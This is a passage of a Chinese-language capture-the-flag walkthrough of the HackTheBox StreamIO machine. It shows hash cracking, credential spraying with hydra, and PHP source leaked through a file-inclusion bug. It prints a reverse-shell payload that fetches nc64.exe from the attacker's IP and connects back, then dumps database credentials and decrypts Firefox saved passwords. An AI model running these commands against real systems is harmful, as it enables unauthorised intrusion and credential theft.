Thane:3577c47eb1e12c8ba021611e1280753c
Theodore:925e5408ecb67aea449373d668b7359e
Victor:bf55e15b119860a6e6b5a164377da719
Victoria:b22abb47a02b52d5dfa27fb0b534f693
William:d62be0dc82071bccc1322d64ec5b6c51
yoshihide:b779ba15cedfd22a023c4d8bcf5f2332
破解凭据hash

先随便复制其中一个hash值,识别hash类型:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# hash-identifier 3961548825e3e21df5646cafe11c6c76
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
。。。

识别出是MD5加密方式,开始尝试破解:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# hashcat creds.txt /usr/share/wordlists/rockyou.txt --user -m 0
hashcat (v6.2.6) starting
。。。
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# hashcat creds.txt /usr/share/wordlists/rockyou.txt --user -m 0 --show
admin:665a50ac9eaa781e4f7f04199db97a11:paddpadd
Barry:54c88b2dbd7b1a84012fabc1a4c73415:$hadoW
Bruno:2a4e2cf22dd8fcb45adcb91be1e22ae8:$monique$1991$
Clara:ef8f3d30a856cf166fb8215aca93e9ff:%$clara
Juliette:6dcd87740abb64edfa36d170f0d5450d:$3xybitch
Lauren:08344b85b329d7efd611b7a7743e8a09:##123a8j8w5123##
Lenord:ee0b8a0937abd60c2882eacb2f8dc49f:physics69i
Michelle:b83439b16f844bd6ffe35c02fe21b3c0:!?Love?!123
Sabrina:f87d3c0d6c8fd686aacc6627f1f493a5:!!sabrina$
Thane:3577c47eb1e12c8ba021611e1280753c:highschoolmusical
Victoria:b22abb47a02b52d5dfa27fb0b534f693:!5psycho8!
yoshihide:b779ba15cedfd22a023c4d8bcf5f2332:66boysandgirls..

保存成新的凭据文件,再分别将用户名和密码存储为单独的文件:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cat cracked_creds.txt | cut -d: -f1 > user
                                  
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cat cracked_creds.txt | cut -d: -f3 > pass

尝试爆破smb共享
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# crackmapexec smb streamio.htb -u user -p pass --continue-on-success
。。。
impacket.smb3.SessionError: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.) 
。。。

显然这些凭据不能用于获取smb共享,既然系统级别无法连接,我们还可以尝试web级别,因为之前还有一个登录页面:

尝试爆破web登录

由于破解时不再需要hash,再对数据进行处理:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cat cracked_creds.txt | cut -d: -f1,3 | tee userpass  
admin:paddpadd
Barry:$hadoW
Bruno:$monique$1991$
Clara:%$clara
Juliette:$3xybitch
Lauren:##123a8j8w5123##
Lenord:physics69i
Michelle:!?Love?!123
Sabrina:!!sabrina$
Thane:highschoolmusical
Victoria:!5psycho8!
yoshihide:66boysandgirls..

开始爆破,注意爆破前先了解清楚相关的表单名和错误页面提示关键词:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# hydra -C userpass streamio.htb https-post-form "/login.php:username=^USER^&password=^PASS^:failed"
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-25 17:09:40
[DATA] max 12 tasks per 1 server, overall 12 tasks, 12 login tries, ~1 try per task
[DATA] attacking http-post-forms://streamio.htb:443/login.php:username=^USER^&password=^PASS^:failed
[443][http-post-form] host: streamio.htb   login: yoshihide   password: 66boysandgirls..
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-02-25 17:09:45

利用该凭据,我们成功登录web,与之前的页面没什么差别,尝试访问admin目录,发现通过该凭据可以访问后台控制台:
2024-02-25-17-15-11
这个页面特别简陋,一看就不像是利用公开的cms框架等方式搭建的,很大可能性是自己写的,所以这种情况出现漏洞的可能性也很大。大致浏览该后台页面的功能点后,暂时也没有什么很大的利用价值,但由于点击每个功能点时,url中发生了变化,每个功能点有对应的参数,那么很有可能存在隐藏的参数,这从开发者的开发习惯来说是存在这种可能的,因此可以尝试fuzz

尝试爆破url参数

注意因为这是登录状态下进行爆破,记得指定当前的cookie值:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# wfuzz -u https://streamio.htb/admin/?FUZZ= -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -H "cookie: PHPSESSID=pv555d6n9ruo2s7btcml2nli93"
。。。
000000791:   200        49 L     131 W      1678 Ch     "batchExtend"                                                                                                                
000000790:   200        49 L     131 W      1678 Ch     "batch"                                                                                                                      
000000789:   200        49 L     131 W      1678 Ch     "baslik"                                                                                                                     
000000788:   200        49 L     131 W      1678 Ch     "basket"                                                                                                                     
000000787:   200        49 L     131 W      1678 Ch     "basic"                                                                                                                      
000000786:   200        49 L     131 W      1678 Ch     "baseurl"                                                                                                                    
000000785:   200        49 L     131 W      1678 Ch     "basemodule"   
。。。     
# 第一次执行时先要排除到响应体中长度特别长并且占大多数的,这里是1678

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# wfuzz -u https://streamio.htb/admin/?FUZZ= -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -H "cookie: PHPSESSID=pv555d6n9ruo2s7btcml2nli93" --hh 1678
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: https://streamio.htb/admin/?FUZZ=
Total requests: 6453

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                      
=====================================================================

000001575:   200        49 L     137 W      1712 Ch     "debug"                                                                                                                      
000003530:   200        10790    25878 W    320235 Ch   "movie"                                                                                                                      
                        L                                                                                                                                                            
000005450:   200        398 L    916 W      12484 Ch    "staff"                                                                                                                      
000006133:   200        62 L     160 W      2073 Ch     "user"                                                                                                                       

Total time: 0
Processed Requests: 6453
Filtered Requests: 6449
Requests/sec.: 0

发现确实存在隐藏参数debug,尝试访问:
2024-02-25-17-32-32
除了一个提示外没有什么特别的,源码也看不出什么,但是回顾之前目录爆破时爆破出的隐藏文件/admin/master.php提示需要被包含才能访问,正好这里有一个?debug=参数,尝试作为该参数的值,即包含,发现确实能访问,这个文件的内容正好是这些已有功能点的集合:
2024-02-25-17-48-33
这看起来感觉没有什么用处,但正是根据当前情景,我们可以大胆推测很可能存在文件包含漏洞,正常来说我们无法访问该php文件的源码,因为当浏览器包含、访问它时就会自动被解析,但当前又是处在调试模式,所以可以通过php的伪协议来获取该php源码

利用文件包含漏洞泄漏php源码

我们可以先利用伪协议将包含的php文件先编码成base64格式,然后复制到本地后再解码查看:
2024-02-25-17-58-17

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cat master_base64 | base64 -d | tee master.php
。。。
php代码审计
<h1>Movie managment</h1>
<?php
if(!defined('included'))
	die("Only accessable through includes");
if(isset($_POST['movie_id']))
{
$query = "delete from movies where id = ".$_POST['movie_id'];
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
}
$query = "select * from movies order by movie";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>

<div>
	<div class="form-control" style="height: 3rem;">
		<h4 style="float:left;"><?php echo $row['movie']; ?></h4>
		<div style="float:right;padding-right: 25px;">
			<form method="POST" action="?movie=">
				<input type="hidden" name="movie_id" value="<?php echo $row['id']; ?>">
				<input type="submit" class="btn btn-sm btn-primary" value="Delete">
			</form>
		</div>
	</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<h1>Staff managment</h1>
<?php
if(!defined('included'))
	die("Only accessable through includes");
$query = "select * from users where is_staff = 1 ";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
if(isset($_POST['staff_id']))
{
?>
<div class="alert alert-success"> Message sent to administrator</div>
<?php
}
$query = "select * from users where is_staff = 1";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>

<div>
	<div class="form-control" style="height: 3rem;">
		<h4 style="float:left;"><?php echo $row['username']; ?></h4>
		<div style="float:right;padding-right: 25px;">
			<form method="POST">
				<input type="hidden" name="staff_id" value="<?php echo $row['id']; ?>">
				<input type="submit" class="btn btn-sm btn-primary" value="Delete">
			</form>
		</div>
	</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<h1>User managment</h1>
<?php
if(!defined('included'))
	die("Only accessable through includes");
if(isset($_POST['user_id']))
{
$query = "delete from users where is_staff = 0 and id = ".$_POST['user_id'];
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
}
$query = "select * from users where is_staff = 0";
$res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC))
{
?>

<div>
	<div class="form-control" style="height: 3rem;">
		<h4 style="float:left;"><?php echo $row['username']; ?></h4>
		<div style="float:right;padding-right: 25px;">
			<form method="POST">
				<input type="hidden" name="user_id" value="<?php echo $row['id']; ?>">
				<input type="submit" class="btn btn-sm btn-primary" value="Delete">
			</form>
		</div>
	</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<form method="POST">
<input name="include" hidden>
</form>
<?php
if(isset($_POST['include']))
{
if($_POST['include'] !== "index.php" ) 
eval(file_get_contents($_POST['include']));
else
echo(" ---- ERROR ---- ");
}
?>

审计分析:
关键在于最后的部分,如果 $_POST['include'] 的值不等于 index.php,则通过 eval() 函数执行 $_POST['include'] 参数指定文件的内容,这也就意味着我们可以利用它来构造反弹shell,这是很顺理成章的事

文件包含配合反弹shell

先准备一个nc64.exe,然后构造php脚本:

system("powershell -c wget 10.10.16.10/nc64.exe -outfile \\programdata\\nc64.exe");
system("\\programdata\\nc64.exe -e powershell 10.10.16.10 443");

这里选择把结果输出到programdata目录下,因为不同用户都可以访问该共享目录
同时用python在本地建立web服务器,并且建立nc的监听
接着,利用burpsuitecurl来完成剩下的过程都可以,为了直观展示这里用curl:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# curl -X POST 'https://streamio.htb/admin/?debug=master.php' -k -b 'PHPSESSID=pv555d6n9ruo2s7btcml2nli93' -d 'include=http://10.10.16.10/revshell.php'

执行上面的命令后,我们在本地的nc监听中反弹到了shell:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# nc -lnvp 443
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.129.225.176:51663.
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\inetpub\streamio.htb\admin> whoami
whoami
streamio\yoshihide
PS C:\inetpub\streamio.htb\admin> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State  
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

然而我们并没有找到flaguser.txt,该用户也没有对应的家目录,能够利用的权限也很少,就是一个普通的webshell,为了提高该shell的交互性,我们还可以用工具rlwrap,将nc的监听替换成该工具,然后重新反弹一次shell:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# rlwrap -cAr nc -lnvp 443

尝试横向迁移

探测php文件与数据库连接部分,看是否泄漏凭据
PS C:\inetpub\streamio.htb> dir -recurse *.php | select-string -pattern "database"
dir -recurse *.php | select-string -pattern "database"

admin\index.php:9:$connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
login.php:46:$connection = array("Database"=>"STREAMIO" , "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
register.php:81:    $connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');


PS C:\inetpub\streamio.htb> cd ../watch.streamio.htb
cd ../watch.streamio.htb
PS C:\inetpub\watch.streamio.htb> dir -recurse *.php | select-string -pattern "database"
dir -recurse *.php | select-string -pattern "database"

search.php:15:$connection = array("Database"=>"STREAMIO", "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');


PS C:\inetpub\watch.streamio.htb> 

确实获取到了一些凭据,其中db_admin是我们最感兴趣的,由这个名字自然可以联想到很可能就是sqlserver的管理员用户

尝试连接sqlserver

先查看目标靶机是否有可以连接sqlserver的交互程序:

PS C:\inetpub\watch.streamio.htb> where.exe sqlcmd
where.exe sqlcmd
C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\SQLCMD.EXE

由于我们用rlwrap提高了shell的交互性,下面的操作可以直接在靶机完成,否则需要利用端口转发的方式(如果靶机速度慢或不想留下太多活动信息也可以选择)在我们的kali上操作,开始连接:

PS C:\inetpub\watch.streamio.htb> sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "SELECT name FROM sys.tables;"
sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "SELECT name FROM sys.tables;"
name                                                                                                                            
--------------------------------------------------------------------------------------------------------------------------------
movies                                                                                                                          
users                                                                                                                           

(2 rows affected)
PS C:\inetpub\watch.streamio.htb> sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "SELECT * FROM users;"
sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "SELECT * FROM users;"
id          username                                           password                                          
----------- -------------------------------------------------- --------------------------------------------------
          1 nikk37                                             389d14cb8e4e9b94b137deb1caf0612a                  
          2 yoshihide                                          b779ba15cedfd22a023c4d8bcf5f2332                  
          3 James                                              c660060492d9edcaa8332d89c99c9239                  
          4 Theodore                                           925e5408ecb67aea449373d668b7359e                  
          5 Samantha                                           083ffae904143c4796e464dac33c1f7d                  
          6 Lauren                                             08344b85b329d7efd611b7a7743e8a09                  
          7 William                                            d62be0dc82071bccc1322d64ec5b6c51                  
          8 Sabrina                                            f87d3c0d6c8fd686aacc6627f1f493a5                  

(8 rows affected)

这里选择查询streamio_backup备份数据库中的数据,因为备份数据库中往往可能存在历史用户凭据,而这在当前的数据库是找不到的,并且数据库streamio已经被我们利用过了
处理数据:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cat creds_dbbackup.txt | awk -F' ' '{print $2":"$3}' | tee creds_dbbackup.txt

破解hash:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]                                       
└─# hashcat creds_dbbackup.txt /usr/share/wordlists/rockyou.txt -m 0 --user --show                               
nikk37:389d14cb8e4e9b94b137deb1caf0612a:get_dem_girls2@yahoo.com
yoshihide:b779ba15cedfd22a023c4d8bcf5f2332:66boysandgirls..
Lauren:08344b85b329d7efd611b7a7743e8a09:##123a8j8w5123##
Sabrina:f87d3c0d6c8fd686aacc6627f1f493a5:!!sabrina$

回顾之前的shell,发现这里的用户nikk37正好有其对应的家目录,所以我们优先尝试利用该用户进行横向迁移

利用evil-winrm连接
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# evil-winrm -u nikk37 -p 'get_dem_girls2@yahoo.com' -i streamio.htb
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\nikk37\Documents> whoami
streamio\nikk37
获取立足点
*Evil-WinRM* PS C:\Users\nikk37\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\nikk37\desktop> ls


    Directory: C:\Users\nikk37\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        2/26/2024   1:49 AM             34 user.txt


*Evil-WinRM* PS C:\Users\nikk37\desktop> cat user.txt
f45a4a88b84668351f92a3729cac0011

f45a4a88b84668351f92a3729cac0011

后渗透信息搜集

显然,横向迁移成功后首先要看当前用户的权限与所在组

*Evil-WinRM* PS C:\Users\nikk37\desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\nikk37\desktop> net user nikk37
User name                    nikk37
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/22/2022 1:57:16 AM
Password expires             Never
Password changeable          2/23/2022 1:57:16 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   2/22/2022 2:39:51 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

并没有特别让我们感兴趣的
查看本地都安装了哪些程序,便于扩展我们的攻击面:

*Evil-WinRM* PS C:\> cd 'Program Files'
*Evil-WinRM* PS C:\Program Files> ls


    Directory: C:\Program Files


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/22/2022   1:35 AM                Common Files
d-----        2/22/2022   2:57 AM                iis express
d-----        3/28/2022   4:46 PM                internet explorer
d-----        2/22/2022   2:14 AM                LAPS
d-----        2/22/2022   2:52 AM                Microsoft
d-----        2/22/2022   1:54 AM                Microsoft SQL Server
d-----        2/22/2022   1:53 AM                Microsoft Visual Studio 10.0
d-----        2/22/2022   1:53 AM                Microsoft.NET
d-----        2/25/2022  11:35 PM                PHP
d-----        2/22/2022   2:56 AM                Reference Assemblies
d-----        2/22/2022   2:56 AM                runphp
d-----        2/22/2022   1:35 AM                VMware
d-r---        3/28/2022   4:46 PM                Windows Defender
d-----        3/28/2022   6:06 PM                Windows Defender Advanced Threat Protection
d-----        3/28/2022   4:46 PM                Windows Mail
d-----        3/28/2022   4:46 PM                Windows Media Player
d-----        9/15/2018  12:19 AM                Windows Multimedia Platform
d-----        9/15/2018  12:28 AM                windows nt
d-----        3/28/2022   4:46 PM                Windows Photo Viewer
d-----        9/15/2018  12:19 AM                Windows Portable Devices
d-----        9/15/2018  12:19 AM                Windows Security
d-----        9/15/2018  12:19 AM                WindowsPowerShell

*Evil-WinRM* PS C:\Program Files> cd ..\'Program Files (x86)'
*Evil-WinRM* PS C:\Program Files (x86)> ls


    Directory: C:\Program Files (x86)


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/15/2018  12:28 AM                Common Files
d-----        2/25/2022  11:35 PM                IIS
d-----        2/25/2022  11:38 PM                iis express
d-----        3/28/2022   4:46 PM                Internet Explorer
d-----        2/22/2022   1:54 AM                Microsoft SQL Server
d-----        2/22/2022   1:53 AM                Microsoft.NET
d-----        5/26/2022   4:09 PM                Mozilla Firefox
d-----        5/26/2022   4:09 PM                Mozilla Maintenance Service
d-----        2/25/2022  11:33 PM                PHP
d-----        2/22/2022   2:56 AM                Reference Assemblies
d-----        3/28/2022   4:46 PM                Windows Defender
d-----        3/28/2022   4:46 PM                Windows Mail
d-----        3/28/2022   4:46 PM                Windows Media Player
d-----        9/15/2018  12:19 AM                Windows Multimedia Platform
d-----        9/15/2018  12:28 AM                windows nt
d-----        3/28/2022   4:46 PM                Windows Photo Viewer
d-----        9/15/2018  12:19 AM                Windows Portable Devices
d-----        9/15/2018  12:19 AM                WindowsPowerShell

其中,LAPSMozilla Firefox是最令人感兴趣的,因为它们中也可能存在凭据的泄漏

尝试从filefox中获取泄漏凭据并破解

搜索:
2024-02-26-12-14-22
我们还在firefox的官方文档中知道了密码存放的文件:
2024-02-26-12-17-03

*Evil-WinRM* PS C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles> cd 5rwivk2l.default
*Evil-WinRM* PS C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\5rwivk2l.default> ls


    Directory: C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\5rwivk2l.default


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2/22/2022   2:40 AM             47 times.json


*Evil-WinRM* PS C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\5rwivk2l.default> cd ..\br53rxeg.default-release
*Evil-WinRM* PS C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release> ls


    Directory: C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/22/2022   2:40 AM                bookmarkbackups
d-----        2/22/2022   2:40 AM                browser-extension-data
d-----        2/22/2022   2:41 AM                crashes
d-----        2/22/2022   2:42 AM                datareporting
d-----        2/22/2022   2:40 AM                minidumps
d-----        2/22/2022   2:42 AM                saved-telemetry-pings
d-----        2/22/2022   2:40 AM                security_state
d-----        2/22/2022   2:42 AM                sessionstore-backups
d-----        2/22/2022   2:40 AM                storage
-a----        2/22/2022   2:40 AM             24 addons.json
-a----        2/22/2022   2:42 AM           5189 addonStartup.json.lz4
-a----        2/22/2022   2:42 AM            310 AlternateServices.txt
-a----        2/22/2022   2:41 AM         229376 cert9.db
-a----        2/22/2022   2:40 AM            208 compatibility.ini
-a----        2/22/2022   2:40 AM            939 containers.json
-a----        2/22/2022   2:40 AM         229376 content-prefs.sqlite
-a----        2/22/2022   2:40 AM          98304 cookies.sqlite
-a----        2/22/2022   2:40 AM           1081 extension-preferences.json
-a----        2/22/2022   2:40 AM          43726 extensions.json
-a----        2/22/2022   2:42 AM        5242880 favicons.sqlite
-a----        2/22/2022   2:41 AM         262144 formhistory.sqlite
-a----        2/22/2022   2:40 AM            778 handlers.json
-a----        2/22/2022   2:40 AM         294912 key4.db
-a----        2/22/2022   2:41 AM           1593 logins-backup.json
-a----        2/22/2022   2:41 AM           2081 logins.json
-a----        2/22/2022   2:42 AM              0 parent.lock
-a----        2/22/2022   2:42 AM          98304 permissions.sqlite
-a----        2/22/2022   2:40 AM            506 pkcs11.txt
-a----        2/22/2022   2:42 AM        5242880 places.sqlite
-a----        2/22/2022   2:42 AM           8040 prefs.js
-a----        2/22/2022   2:42 AM            180 search.json.mozlz4
-a----        2/22/2022   2:42 AM            288 sessionCheckpoints.json
-a----        2/22/2022   2:42 AM           1853 sessionstore.jsonlz4
-a----        2/22/2022   2:40 AM             18 shield-preference-experiments.json
-a----        2/22/2022   2:42 AM            611 SiteSecurityServiceState.txt
-a----        2/22/2022   2:42 AM           4096 storage.sqlite
-a----        2/22/2022   2:40 AM             50 times.json
-a----        2/22/2022   2:40 AM          98304 webappsstore.sqlite
-a----        2/22/2022   2:42 AM            141 xulstore.json

我们也确实找到了这两个文件,当我们查看内容时,有部分是乱码,并且显示的密码是加密形式,我们可以再尝试寻找是否有专门破解firefox密码的工具:
2024-02-26-12-21-03
2024-02-26-12-22-51
大致阅读了解其破解原理以及工具的原理后,找到了一个不需要NSS库,只需要python就能运行的工具:
2024-02-26-12-28-01
https://github.com/lclevy/firepwd
2024-02-26-12-28-52
先把关键的文件传输到kali中:

*Evil-WinRM* PS C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release> download key4.db
                                        
Info: Downloading C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\key4.db to key4.db
                                        
Info: Download successful!
*Evil-WinRM* PS C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release> download logins.json
                                        
Info: Downloading C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\logins.json to logins.json
                                        
Info: Download successful!

以防万一,可以把firefox根目录的nss库也下载下来:

*Evil-WinRM* PS C:\Users\nikk37\Documents> cd C:\'Program Files (x86)'\'Mozilla Firefox'
*Evil-WinRM* PS C:\Program Files (x86)\Mozilla Firefox> download nss3.dll
                                        
Info: Downloading C:\Program Files (x86)\Mozilla Firefox\nss3.dll to nss3.dll

Info: Download successful!

开始尝试破解:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]                
└─# git clone https://github.com/lclevy/firepwd.git   
。。。
┌──(root㉿hunter)-[/home/…/Desktop/htb/StreamIO/firepwd]
└─# chmod +x firepwd.py 
                                                                                                                                                                                                                   
┌──(root㉿hunter)-[/home/…/Desktop/htb/StreamIO/firepwd]
└─# ./firepwd.py 
./firepwd.py: 行 17: 
 decode Firefox passwords (https://github.com/lclevy/firepwd)
 
 lclevy@free.fr 
 28 Aug 2013: initial version, Oct 2016: support for logins.json, Feb 2018: support for key4.db, 
 Apr2020: support for NSS 3.49 / Firefox 75.0 : https://hg.mozilla.org/projects/nss/rev/fc636973ad06392d11597620b602779b4af312f6
 
 for educational purpose only, not production level
 integrated into https://github.com/AlessandroZ/LaZagne
 tested with python 3.7.3, PyCryptodome 3.9.0 and pyasn 0.4.8

 key3.db is read directly, the 3rd party bsddb python module is NOT needed
 NSS library is NOT needed
 
 profile directory under Win10 is C:\\Users\\[user]\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\[profile_name]
 
: 没有那个文件或目录
./firepwd.py: 行 19: from: 未找到命令
./firepwd.py: 行 20: import: 未找到命令
./firepwd.py: 行 21: from: 未找到命令
./firepwd.py: 行 22: import: 未找到命令
./firepwd.py: 行 23: from: 未找到命令
./firepwd.py: 行 25: from: 未找到命令
./firepwd.py: 行 26: from: 未找到命令
./firepwd.py: 行 27: import: 未找到命令
./firepwd.py: 行 28: from: 未找到命令
./firepwd.py: 行 29: from: 未找到命令
./firepwd.py: 行 30: from: 未找到命令
./firepwd.py: 行 31: from: 未找到命令
./firepwd.py: 行 32: import: 未找到命令
./firepwd.py: 行 33: from: 未找到命令
./firepwd.py: 行 35: 未预期的记号 "(" 附近有语法错误
./firepwd.py: 行 35: `def getShortLE(d, a):'
# 报错表明需要先把刚才的两个关键凭据文件放入到该目录下
┌──(root㉿hunter)-[/home/…/Desktop/htb/StreamIO/firepwd]
└─# cd ..                   
                 
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# mkdir firefox_creds     
                 
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cp key4.db logins.json ./firefox_creds 
                
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# python3 ./firepwd/firepwd.py firefox_creds  
Traceback (most recent call last):
  File "/home/cvestone/Desktop/htb/StreamIO/./firepwd/firepwd.py", line 28, in <module>
    from Crypto.Cipher import DES3, AES
ModuleNotFoundError: No module named 'Crypto'
             
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# pip3 install pycryptodome
。。。

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# python3 ./firepwd/firepwd.py firefox_creds
globalSalt: b'd215c391179edb56af928a06c627906bcbd4bd47'
 SEQUENCE {
   SEQUENCE {
     OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
     SEQUENCE {
       SEQUENCE {
         OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
         SEQUENCE {
           OCTETSTRING b'5d573772912b3c198b1e3ee43ccb0f03b0b23e46d51c34a2a055e00ebcd240f5'
           INTEGER b'01'
           INTEGER b'20'
           SEQUENCE {
             OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
           }
         }
       }
       SEQUENCE {
         OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
         OCTETSTRING b'1baafcd931194d48f8ba5775a41f'
       }
     }
   }
   OCTETSTRING b'12e56d1c8458235a4136b280bd7ef9cf'
 }
clearText b'70617373776f72642d636865636b0202'
password check? True
 SEQUENCE {
   SEQUENCE {
     OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
     SEQUENCE {
       SEQUENCE {
         OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
         SEQUENCE {
           OCTETSTRING b'098560d3a6f59f76cb8aad8b3bc7c43d84799b55297a47c53d58b74f41e5967e'
           INTEGER b'01'
           INTEGER b'20'
           SEQUENCE {
             OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
           }
         }
       }
       SEQUENCE {
         OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
         OCTETSTRING b'e28a1fe8bcea476e94d3a722dd96'
       }
     }
   }
   OCTETSTRING b'51ba44cdd139e4d2b25f8d94075ce3aa4a3d516c2e37be634d5e50f6d2f47266'
 }
clearText b'b3610ee6e057c4341fc76bc84cc8f7cd51abfe641a3eec9d0808080808080808'
decrypting login/password pairs
https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r'
https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)'
https://slack.streamio.htb:b'yoshihide',b'paddpadd@12'
